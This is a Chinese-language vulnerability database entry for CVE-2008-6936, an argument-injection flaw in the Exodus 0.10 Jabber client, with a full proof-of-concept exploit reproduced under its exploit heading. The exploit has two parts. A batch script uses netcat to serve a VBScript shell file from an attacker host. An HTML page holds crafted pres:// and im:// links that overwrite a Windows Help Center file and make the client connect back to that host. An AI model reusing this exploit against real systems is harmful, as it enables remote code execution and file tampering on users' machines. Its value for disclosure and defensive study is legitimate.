jabber exodus pres:// URI中的代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184601 漏洞类型 代码注入
发布时间 2008-11-17 更新时间 2009-08-12
CVE编号 CVE-2008-6936 CNNVD-ID CNNVD-200908-091
漏洞平台 N/A CVSS评分 9.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2009080104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-091
|漏洞详情
Exodus0.10的变量注入漏洞会允许远程攻击者通过一个pres://URI中的编码空间来注入任意命令行变量,写满任意文件,并造成拒绝服务。该漏洞不同于CVE-2008-6935。
|漏洞EXP
<!--
Exodus v0.10 remote code execution exploit
by Nine:Situations:Group::strawdog

This uses the "-l" argument to overwrite a file
inside Microsoft Help and Support Center folders (oh rgod...)

Firstly run netcat in listen mode to drop the vbscript shell
run this script:

@echo off
rem dropsh.cmd
echo ^<SCRIPT LANGUAGE="VBScript"^> > testfile
echo Dim wshShell >> testfile
echo Set wshShell = CreateObject("WScript.Shell") >> testfile
echo wshShell.Run("cmd /c start calc") >> testfile
echo ^</SCRIPT^> >> testfile
nc -L -s 192.168.0.1 -p 5222 -vv < testfile

-->
<html>
<head>
<script type="text/javascript">
<!--
function doRedirect() {
location.href = "hcp://system/sysinfo/msinfo.htm";
}
function runcalc() {
window.setTimeout("doRedirect()", 10000);
}
//-->
</script>
<a href="im:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%20strawdog@192.168.0.1%20-p%20AAAA%20%00" onClick="runcalc()">click me</a><br>
<a href="pres:///'%20-l%20C:\WINDOWS\PCHEALTH\HELPCTR\System\sysinfo\msinfo.htm%20-j%20strawdog@192.168.0.1%20-p%20AAAA%20%00" onClick="runcalc()">click me</a>
</html>

|参考资料

来源:XF
名称:exodus-presuri-command-execution(52630)
链接:http://xforce.iss.net/xforce/xfdb/52630
来源:MILW0RM
名称:7167
链接:http://www.milw0rm.com/exploits/7167
来源:SECUNIA
名称:32729
链接:http://secunia.com/advisories/32729